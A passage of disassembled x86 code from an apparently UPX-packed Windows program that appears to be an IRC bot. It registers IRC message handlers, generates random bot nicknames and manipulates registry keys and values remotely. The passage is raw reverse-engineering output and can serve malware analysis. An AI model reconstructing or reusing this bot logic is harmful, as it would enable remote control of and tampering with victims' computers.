; ---------------------------------------------------------------------------
db 22h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40731E proc near ; CODE XREF: sub_401136�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_4011A9
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_40737F
cmp [ebp+var_4], 0
jz short loc_40737F
mov eax, dword_413814
mov esi, offset word_40FD66
imul eax, 188h
add eax, esi
push offset byte_413980
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40737F
mov eax, dword_413814
mov ecx, [ebp+arg_8]
imul eax, 188h
add eax, esi
push 0
push eax
push [ebp+var_4]
call sub_401267
loc_40737F: ; CODE XREF: sub_40731E+1B�j
; sub_40731E+21�j ...
xor eax, eax
pop esi
leave
retn
sub_40731E endp
; ---------------------------------------------------------------------------
db 19h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40739D proc near ; CODE XREF: sub_401050�j
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push 7
push 5
call sub_40129E
mov ecx, [esp+arg_8]
push eax
call sub_401195
xor eax, eax
retn
sub_40739D endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4073BD proc near ; CODE XREF: sub_401181�j
xor eax, eax
retn
sub_4073BD endp
; =============== S U B R O U T I N E =======================================
sub_4073C0 proc near ; CODE XREF: sub_4010D7�j
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push offset sub_401181
push offset aError_0 ; "ERROR"
mov ecx, esi
call sub_401253
push offset sub_4010B4
push offset aPrivmsg ; "PRIVMSG"
mov ecx, esi
call sub_401253
push offset sub_4010B9
push offset aKick ; "KICK"
mov ecx, esi
call sub_401253
mov edi, offset sub_4012D5
mov ecx, esi
push edi
push offset aTopic_0 ; "TOPIC"
call sub_401253
push offset sub_401064
push offset a001 ; "001"
mov ecx, esi
call sub_401253
push edi
push offset a332 ; "332"
mov ecx, esi
call sub_401253
push offset sub_401136
push offset a366 ; "366"
mov ecx, esi
call sub_401253
mov edi, offset loc_401172
mov ecx, esi
push edi
push offset a005 ; "005"
call sub_401253
push edi
push offset a376 ; "376"
mov ecx, esi
call sub_401253
push edi
push offset a422 ; "422"
mov ecx, esi
call sub_401253
push offset sub_401050
push offset a433 ; "433"
mov ecx, esi
call sub_401253
pop edi
pop esi
retn
sub_4073C0 endp
; ---------------------------------------------------------------------------
db 2Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4074A8 proc near ; CODE XREF: sub_401168�j
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 8
call ds:dword_47B5DC ; malloc
push 8
push 0
push eax
mov [ebp+var_C], eax
call sub_40C294 ; memset
mov ebx, ds:dword_47B5EC
call ebx ; dword_47B5EC
push 1Ah
mov esi, offset a0123456789abcd ; "0123456789abcdefghijklmnopqrstuvwxyz"
cdq
pop ecx
lea edi, [ebp+var_34]
idiv ecx
push 9
pop ecx
rep movsd
movsb
add dl, 61h
mov [ebp+var_6], dl
call ebx ; dword_47B5EC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_5], al
call ebx ; dword_47B5EC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_4], al
call ebx ; dword_47B5EC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_3], al
call ebx ; dword_47B5EC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_2], al
call ebx ; dword_47B5EC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_1], al
call ebx ; dword_47B5EC
cdq
idiv esi
movsx eax, [ebp+edx+var_34]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
push offset aCCCCCCC ; "%c%c%c%c%c%c%c"
push [ebp+var_C]
call ds:dword_47B5FC ; sprintf
mov eax, [ebp+var_C]
add esp, 34h
pop edi
pop esi
pop ebx
leave
retn
sub_4074A8 endp
; ---------------------------------------------------------------------------
db 32h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4075A5: ; CODE XREF: UPX0:00401145�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40E0D0
push offset loc_40C3C6
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
mov edi, [ebp+8]
lea esi, [edi+1]
push esi
call ds:dword_47B5DC ; malloc
mov ebx, eax
mov [ebp-1Ch], ebx
push esi
push 0
push ebx
call sub_40C294 ; memset
add esp, 10h
and dword ptr [ebp-24h], 0
loc_4075F1: ; CODE XREF: UPX0:00407617�j
cmp [ebp-24h], edi
jge short loc_407619
call ds:dword_47B5EC ; rand
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov [ebp-20h], edx
lea eax, [ebp-20h]
push eax
push ebx
call sub_40C29A ; strcat
pop ecx
pop ecx
inc dword ptr [ebp-24h]
jmp short loc_4075F1
; ---------------------------------------------------------------------------
loc_407619: ; CODE XREF: UPX0:004075F4�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, ebx
jmp short loc_407631
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_401168
loc_407631: ; CODE XREF: UPX0:0040761F�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; ---------------------------------------------------------------------------
loc_407666: ; CODE XREF: UPX0:0040119F�j
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_47B5EC ; rand
mov esi, [ebp+8]
mov [ebp-4], eax
mov eax, [ebp+0Ch]
fild dword ptr [ebp-4]
sub eax, esi
inc eax
mov [ebp+0Ch], eax
fimul dword ptr [ebp+0Ch]
fmul dbl_40E0E0
call sub_40C3CC ; _ftol
sub esi, eax
mov eax, esi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_4076A4: ; CODE XREF: UPX0:00401109�j
push esi
mov esi, ds:dword_47B5EC
push edi
call esi ; dword_47B5EC
mov edi, eax
shl edi, 10h
call esi ; dword_47B5EC
add eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4076BF: ; CODE XREF: UPX0:004012B2�j
jmp ds:dword_47B5EC
; ---------------------------------------------------------------------------
loc_4076C5: ; CODE XREF: UPX0:004010EB�j
push esi
mov esi, [esp+8]
push esi
push offset aHkey_local_mac ; "HKEY_LOCAL_MACHINE"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40779C
push esi
push offset aHklm ; "HKLM"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40779C
push esi
push offset aHkey_current_u ; "HKEY_CURRENT_USER"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407795
push esi
push offset aHkcu ; "HKCU"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_407795
push esi
push offset aHkey_classes_r ; "HKEY_CLASSES_ROOT"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40778E
push esi
push offset aHkcr ; "HKCR"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40778E
push esi
push offset aHkey_current_c ; "HKEY_CURRENT_CONFIG"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_407787
push esi
push offset aHkcc ; "HKCC"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_407787
push esi
push offset aHkey_users ; "HKEY_USERS"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_407780
push esi
push offset aHku ; "HKU"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40779C
loc_407780: ; CODE XREF: UPX0:0040776D�j
mov eax, 80000003h
pop esi
retn
; ---------------------------------------------------------------------------
loc_407787: ; CODE XREF: UPX0:0040774B�j
; UPX0:0040775C�j
mov eax, 80000005h
pop esi
retn
; ---------------------------------------------------------------------------
loc_40778E: ; CODE XREF: UPX0:00407729�j
; UPX0:0040773A�j
mov eax, 80000000h
pop esi
retn
; ---------------------------------------------------------------------------
loc_407795: ; CODE XREF: UPX0:00407703�j
; UPX0:00407718�j
mov eax, 80000001h
pop esi
retn
; ---------------------------------------------------------------------------
loc_40779C: ; CODE XREF: UPX0:004076D9�j
; UPX0:004076EE�j ...
mov eax, 80000002h
pop esi
retn
; ---------------------------------------------------------------------------
db 37h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4077DA: ; CODE XREF: UPX0:00401037�j
push ebp
mov ebp, esp
mov eax, [ebp+8]
cmp eax, 80000002h
jz short loc_407853
cmp eax, 80000001h
jnz short loc_407802
cmp dword ptr [ebp+0Ch], 0
jnz short loc_4077FB
mov eax, offset aHkey_current_u ; "HKEY_CURRENT_USER"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077FB: ; CODE XREF: UPX0:004077F2�j
mov eax, offset aHkcu ; "HKCU"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407802: ; CODE XREF: UPX0:004077EC�j
cmp eax, 80000000h
jnz short loc_40781D
cmp dword ptr [ebp+0Ch], 0
jnz short loc_407816
mov eax, offset aHkey_classes_r ; "HKEY_CLASSES_ROOT"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407816: ; CODE XREF: UPX0:0040780D�j
mov eax, offset aHkcr ; "HKCR"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40781D: ; CODE XREF: UPX0:00407807�j
cmp eax, 80000005h
jnz short loc_407838
cmp dword ptr [ebp+0Ch], 0
jnz short loc_407831
mov eax, offset aHkey_current_c ; "HKEY_CURRENT_CONFIG"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407831: ; CODE XREF: UPX0:00407828�j
mov eax, offset aHkcc ; "HKCC"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407838: ; CODE XREF: UPX0:00407822�j
cmp eax, 80000003h
jnz short loc_407853
cmp dword ptr [ebp+0Ch], 0
jnz short loc_40784C
mov eax, offset aHkey_users ; "HKEY_USERS"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40784C: ; CODE XREF: UPX0:00407843�j
mov eax, offset aHku ; "HKU"
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407853: ; CODE XREF: UPX0:004077E5�j
; UPX0:0040783D�j
cmp dword ptr [ebp+0Ch], 0
mov eax, offset aHkey_local_mac ; "HKEY_LOCAL_MACHINE"
jz short loc_407863
mov eax, offset aHklm ; "HKLM"
loc_407863: ; CODE XREF: UPX0:0040785C�j
pop ebp
retn
; ---------------------------------------------------------------------------
db 22h dup(0CCh)
; ---------------------------------------------------------------------------
loc_407887: ; CODE XREF: UPX0:00401244�j
push esi
mov esi, ds:dword_47B4E0
push edi
mov edi, [esp+0Ch]
push offset aReg_sz ; "REG_SZ"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078FF
push offset aSz ; "SZ"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078FF
push offset aReg_expand_sz ; "REG_EXPAND_SZ"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078FB
push offset aEx ; "EX"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078FB
push offset aReg_multi_sz ; "REG_MULTI_SZ"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078F7
push offset aMu ; "MU"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078F7
push offset aReg_dword ; "REG_DWORD"
push edi
call esi ; dword_47B4E0
test eax, eax
jz short loc_4078F3
push offset aDw ; "DW"
push edi
call esi ; dword_47B4E0
test eax, eax
jnz short loc_4078FF
loc_4078F3: ; CODE XREF: UPX0:004078E5�j
push 4
jmp short loc_407901
; ---------------------------------------------------------------------------
loc_4078F7: ; CODE XREF: UPX0:004078CD�j
; UPX0:004078D9�j
push 7
jmp short loc_407901
; ---------------------------------------------------------------------------
loc_4078FB: ; CODE XREF: UPX0:004078B5�j
; UPX0:004078C1�j
push 2
jmp short loc_407901
; ---------------------------------------------------------------------------
loc_4078FF: ; CODE XREF: UPX0:0040789D�j
; UPX0:004078A9�j ...
push 1
loc_407901: ; CODE XREF: UPX0:004078F5�j
; UPX0:004078F9�j ...
pop eax
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_407924 proc near ; CODE XREF: sub_401177�j
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 4
ja short loc_40795B
jz short loc_407955
sub eax, 0
jz short loc_40794F
dec eax
jz short loc_407949
dec eax
jz short loc_407943
dec eax
jnz short loc_40796B
mov eax, offset aReg_binary ; "REG_BINARY"
retn
; ---------------------------------------------------------------------------
loc_407943: ; CODE XREF: sub_407924+14�j
mov eax, offset aReg_expand_sz ; "REG_EXPAND_SZ"
retn
; ---------------------------------------------------------------------------
loc_407949: ; CODE XREF: sub_407924+11�j
mov eax, offset aReg_sz ; "REG_SZ"
retn
; ---------------------------------------------------------------------------
loc_40794F: ; CODE XREF: sub_407924+E�j
mov eax, offset aReg_none ; "REG_NONE"
retn
; ---------------------------------------------------------------------------
loc_407955: ; CODE XREF: sub_407924+9�j
mov eax, offset aReg_dword ; "REG_DWORD"
retn
; ---------------------------------------------------------------------------
loc_40795B: ; CODE XREF: sub_407924+7�j
sub eax, 5
jz short loc_407983
dec eax
jz short loc_40797D
dec eax
jz short loc_407977
sub eax, 4
jz short loc_407971
loc_40796B: ; CODE XREF: sub_407924+17�j
mov eax, offset aUnknown_0 ; "UNKNOWN"
retn
; ---------------------------------------------------------------------------
loc_407971: ; CODE XREF: sub_407924+45�j
mov eax, offset aReg_qword ; "REG_QWORD"
retn
; ---------------------------------------------------------------------------
loc_407977: ; CODE XREF: sub_407924+40�j
mov eax, offset aReg_multi_sz ; "REG_MULTI_SZ"
retn
; ---------------------------------------------------------------------------
loc_40797D: ; CODE XREF: sub_407924+3D�j
mov eax, offset aReg_link ; "REG_LINK"
retn
; ---------------------------------------------------------------------------
loc_407983: ; CODE XREF: sub_407924+3A�j
mov eax, offset aReg_dword_big_ ; "REG_DWORD_BIG_ENDIAN"
retn
sub_407924 endp
; ---------------------------------------------------------------------------
db 19h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079A2 proc near ; CODE XREF: sub_401212�j
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
mov [ebp+var_4], ebx
jz loc_407AC1
cmp [ebp+arg_8], ebx
jnz loc_407A83
push [ebp+arg_4]
push [ebp+arg_0]
call dword_413DF8 ; RegDeleteKeyA
test eax, eax
jz loc_407AB6
push 3Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_10B]
mov [ebp+var_10C], bl
xor esi, esi
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+arg_8], 100h
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz loc_407AC1
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+arg_8]
push ebx
push eax
lea eax, [ebp+var_10C]
push eax
push ebx
push [ebp+var_4]
call dword_413DCC ; RegEnumKeyExA
mov edi, 103h
loc_407A37: ; CODE XREF: sub_4079A2+D1�j
cmp eax, edi
jz short loc_407A75
cmp eax, ebx
jnz short loc_407A75
lea eax, [ebp+var_10C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401212
add esp, 0Ch
lea ecx, [ebp+var_C]
mov eax, esi
inc esi
push ecx
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ebx
push ecx
lea ecx, [ebp+var_10C]
push ecx
push eax
push [ebp+var_4]
call dword_413DCC ; RegEnumKeyExA
jmp short loc_407A37
; ---------------------------------------------------------------------------
loc_407A75: ; CODE XREF: sub_4079A2+97�j
; sub_4079A2+9B�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_413DF8 ; RegDeleteKeyA
jmp short loc_407AC1
; ---------------------------------------------------------------------------
loc_407A83: ; CODE XREF: sub_4079A2+1D�j
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz short loc_407AC1
push [ebp+arg_8]
push [ebp+var_4]
call dword_413DC8 ; RegDeleteValueA
push [ebp+var_4]
test eax, eax
jnz short loc_407ABB
call dword_413E64 ; RegCloseKey
loc_407AB6: ; CODE XREF: sub_4079A2+31�j
push 1
pop eax
jmp short loc_407AC3
; ---------------------------------------------------------------------------
loc_407ABB: ; CODE XREF: sub_4079A2+10C�j
call dword_413E64 ; RegCloseKey
loc_407AC1: ; CODE XREF: sub_4079A2+14�j
; sub_4079A2+6E�j ...
xor eax, eax
loc_407AC3: ; CODE XREF: sub_4079A2+117�j
pop edi
pop esi
pop ebx
leave
retn
sub_4079A2 endp
; ---------------------------------------------------------------------------
db 49h dup(0CCh)
; ---------------------------------------------------------------------------
loc_407B11: ; CODE XREF: UPX0:004010C3�j
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+0Ch]
xor esi, esi
cmp edi, esi
mov [ebp-4], esi
jz short loc_407B9F
cmp [ebp+10h], esi
jz short loc_407B9F
lea eax, [ebp-4]
push eax
push 2001Fh
push esi
push edi
push dword ptr [ebp+8]
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz short loc_407B9B
mov eax, [ebp+14h]
cmp eax, 4
jnz short loc_407B6A
lea eax, [ebp+0Ch]
mov [ebp+0Ch], esi
push eax
push dword ptr [ebp+10h]
push edi
push dword ptr [ebp+8]
call sub_40111D
add esp, 10h
xor eax, eax
cmp [ebp+0Ch], esi
setnz al
mov esi, eax
jmp short loc_407B92
; ---------------------------------------------------------------------------
loc_407B6A: ; CODE XREF: UPX0:00407B46�j
cmp eax, 1
jz short loc_407B79
cmp eax, 2
jz short loc_407B79
cmp eax, 7
jnz short loc_407B92
loc_407B79: ; CODE XREF: UPX0:00407B6D�j
; UPX0:00407B72�j
push 1
push dword ptr [ebp+10h]
push edi
push dword ptr [ebp+8]
call sub_4010AA
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
neg esi
loc_407B92: ; CODE XREF: UPX0:00407B68�j
; UPX0:00407B77�j
push dword ptr [ebp-4]
call dword_413E64 ; RegCloseKey
loc_407B9B: ; CODE XREF: UPX0:00407B3E�j
mov eax, esi
jmp short loc_407BA1
; ---------------------------------------------------------------------------
loc_407B9F: ; CODE XREF: UPX0:00407B21�j
; UPX0:00407B26�j
xor eax, eax
loc_407BA1: ; CODE XREF: UPX0:00407B9D�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 25h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BCA proc near ; CODE XREF: sub_40111D�j
var_41BC = byte ptr -41BCh
var_1BC = byte ptr -1BCh
var_BC = byte ptr -0BCh
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 41BCh
call sub_40C3E0
push ebx
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
push 0F003Fh
push ebx
mov edi, 0FFh
push [ebp+arg_4]
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_1C], edi
push [ebp+arg_0]
mov [ebp+var_14], 3FFFh
mov [ebp+var_20], 80h
mov [ebp+var_4], ebx
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz loc_407D6E
lea eax, [ebp+var_30]
push esi
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_20]
push ebx
push eax
lea eax, [ebp+var_BC]
push eax
push [ebp+var_8]
call dword_413E1C ; RegQueryInfoKeyA
cmp [ebp+var_C], ebx
mov [ebp+arg_0], ebx
jz short loc_407CAD
xor esi, esi
cmp [ebp+var_C], ebx
jbe short loc_407CAD
loc_407C5D: ; CODE XREF: sub_407BCA+E1�j
lea eax, [ebp+var_30]
mov [ebp+var_1C], edi
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_1BC]
push eax
push esi
push [ebp+var_8]
call dword_413DCC ; RegEnumKeyExA
test eax, eax
jnz short loc_407CA4
lea eax, [ebp+var_1BC]
push eax
lea eax, [esi+1]
push [ebp+arg_4]
push eax
push offset a_2dSS ; "(%.2d) %s\\%s"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_40104B
add esp, 18h
inc [ebp+var_4]
loc_407CA4: ; CODE XREF: sub_407BCA+B4�j
inc esi
inc [ebp+arg_0]
cmp esi, [ebp+var_C]
jb short loc_407C5D
loc_407CAD: ; CODE XREF: sub_407BCA+8A�j
; sub_407BCA+91�j
cmp [ebp+var_10], ebx
jz loc_407D5A
xor edi, edi
cmp [ebp+var_10], ebx
jbe loc_407D5A
mov eax, [ebp+arg_0]
lea esi, [eax+1]
loc_407CC7: ; CODE XREF: sub_407BCA+18A�j
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_41BC]
push eax
push edi
push [ebp+var_8]
mov [ebp+var_14], 0FFh
mov [ebp+var_41BC], bl
call dword_413D68 ; RegEnumValueA
test eax, eax
jnz short loc_407D4F
lea eax, [ebp+var_41BC]
push offset byte_413980
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_407D25
cmp [ebp+var_18], 1
jnz short loc_407D25
lea eax, [ebp+var_41BC]
push offset aDefault ; "(Default)"
push eax
call ds:dword_47B5FC ; sprintf
pop ecx
pop ecx
loc_407D25: ; CODE XREF: sub_407BCA+13F�j
; sub_407BCA+145�j
push [ebp+var_18]
call sub_401177
push eax
lea eax, [ebp+var_41BC]
push eax
push [ebp+arg_4]
push esi
push offset a_2dSSS ; "(%.2d) %s\\%s (%s)"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_40104B
add esp, 20h
inc [ebp+var_4]
loc_407D4F: ; CODE XREF: sub_407BCA+128�j
inc edi
inc esi
cmp edi, [ebp+var_10]
jb loc_407CC7
loc_407D5A: ; CODE XREF: sub_407BCA+E6�j
; sub_407BCA+F1�j
push [ebp+var_8]
call dword_413E64 ; RegCloseKey
xor eax, eax
cmp [ebp+var_4], ebx
pop esi
setnle al
jmp short loc_407D70
; ---------------------------------------------------------------------------
loc_407D6E: ; CODE XREF: sub_407BCA+48�j
xor eax, eax
loc_407D70: ; CODE XREF: sub_407BCA+1A2�j
pop edi
pop ebx
leave
retn
sub_407BCA endp
; ---------------------------------------------------------------------------
db 6Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_407DDE: ; CODE XREF: UPX0:00401276�j
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 4
pop eax
xor esi, esi
mov [ebp-10h], eax
mov [ebp-0Ch], eax
lea eax, [ebp-4]
mov [ebp-4], esi
push eax
push 0F003Fh
push esi
mov [ebp-8], esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz short loc_407E4A
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-10h]
push eax
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call dword_413D54 ; RegQueryValueExA
push dword ptr [ebp-4]
test eax, eax
jnz short loc_407E44
call dword_413E64 ; RegCloseKey
mov eax, [ebp+14h]
mov dword ptr [eax], 1
mov eax, [ebp-8]
jmp short loc_407E51
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: UPX0:00407E2E�j
call dword_413E64 ; RegCloseKey
loc_407E4A: ; CODE XREF: UPX0:00407E0E�j
mov eax, [ebp+14h]
mov [eax], esi
xor eax, eax
loc_407E51: ; CODE XREF: UPX0:00407E42�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 1Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E71 proc near ; CODE XREF: sub_4010AA�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov eax, 0FFFFh
push esi
xor ebx, ebx
push eax
mov esi, offset dword_4140BC
push ebx
push esi
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_413F2C ; RegOpenKeyExA
test eax, eax
jnz short loc_407F17
lea eax, [ebp+var_8]
push eax
push esi
push ebx
push ebx
push [ebp+arg_8]
push [ebp+var_4]
call dword_413D54 ; RegQueryValueExA
test eax, eax
jnz short loc_407F0E
cmp [ebp+arg_C], 7
jnz short loc_407F01
mov ecx, [ebp+var_8]
mov byte ptr dword_4140BC[ecx], bl
loc_407ED5: ; CODE XREF: sub_407E71+72�j
cmp ecx, ebx
jz short loc_407EE5
dec ecx
mov [ebp+var_8], ecx
cmp byte ptr dword_4140BC[ecx], bl
jz short loc_407ED5
loc_407EE5: ; CODE XREF: sub_407E71+66�j
xor edx, edx
cmp ecx, ebx
jbe short loc_407F01
loc_407EEB: ; CODE XREF: sub_407E71+8E�j
cmp byte ptr dword_4140BC[edx], bl
lea eax, dword_4140BC[edx]
jnz short loc_407EFC
mov byte ptr [eax], 0Ah
loc_407EFC: ; CODE XREF: sub_407E71+86�j
inc edx
cmp edx, ecx
jb short loc_407EEB
loc_407F01: ; CODE XREF: sub_407E71+59�j
; sub_407E71+78�j
push [ebp+var_4]
call dword_413E64 ; RegCloseKey
mov eax, esi
jmp short loc_407F19
; ---------------------------------------------------------------------------
loc_407F0E: ; CODE XREF: sub_407E71+53�j
push [ebp+var_4]
call dword_413E64 ; RegCloseKey
loc_407F17: ; CODE XREF: sub_407E71+3C�j
xor eax, eax
loc_407F19: ; CODE XREF: sub_407E71+9B�j
pop esi
pop ebx
leave
retn
sub_407E71 endp
; ---------------------------------------------------------------------------
db 2Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_407F48: ; CODE XREF: UPX0:004012FD�j
push ebp
mov ebp, esp
push ecx
push ecx
push dword ptr [ebp-4]
mov eax, [ebp+14h]
push eax
push 4
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_4012CB
add esp, 18h
leave
retn
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F71 proc near ; CODE XREF: sub_401069�j
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_10], 1
mov eax, [ebp+arg_C]
jnz short loc_407F98
push eax
push [ebp+var_8]
push 1
loc_407F85: ; CODE XREF: sub_407F71+33�j
; sub_407F71+41�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4012CB
add esp, 18h
leave
retn
; ---------------------------------------------------------------------------
loc_407F98: ; CODE XREF: sub_407F71+C�j
cmp [ebp+arg_10], 2
jnz short loc_407FA6
push eax
push [ebp+var_8]
push 2
jmp short loc_407F85
; ---------------------------------------------------------------------------
loc_407FA6: ; CODE XREF: sub_407F71+2B�j
cmp [ebp+arg_10], 7
jnz short loc_407FB4
push eax
